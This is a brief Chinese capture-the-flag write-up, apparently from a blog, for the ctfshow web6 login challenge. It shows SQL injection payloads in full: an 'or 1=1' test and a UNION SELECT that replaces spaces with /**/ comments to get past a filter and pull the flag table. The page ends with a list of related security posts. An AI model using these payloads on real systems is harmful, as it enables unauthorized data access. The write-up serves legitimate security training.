ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
网安小白的进阶之路1 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-4
网络·web安全·php
落一落,掉一掉1 小时前
第十五周Fscan和利用漏洞上线远程和数据库提权上线远控
安全·web安全
九河云6 小时前
数字化转型中的网络安全风险与零信任架构实践
运维·科技·安全·web安全·架构
jenchoi41313 小时前
【2025-11-02】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
安全·web安全·网络安全
上海云盾-高防顾问13 小时前
什么是端口管理?网络安全的关键环节
安全·web安全
风语者日志15 小时前
[LitCTF 2023]作业管理系统
前端·网络·安全·web安全·ctf
Never_z&y16 小时前
攻防世界-cat_cat_new(任意文件读取、Linux敏感文件、flask-session伪造)
web安全
一只鹿鹿鹿18 小时前
系统安全设计方案书(Word)
开发语言·人工智能·web安全·需求分析·软件系统
犬大犬小19 小时前
什么是 webSocket?攻击面、安全风险与测试要点
安全·web安全·安全性测试
岛屿旅人1 天前
英国国防部推进本土化开放架构建设
网络·人工智能·安全·web安全·架构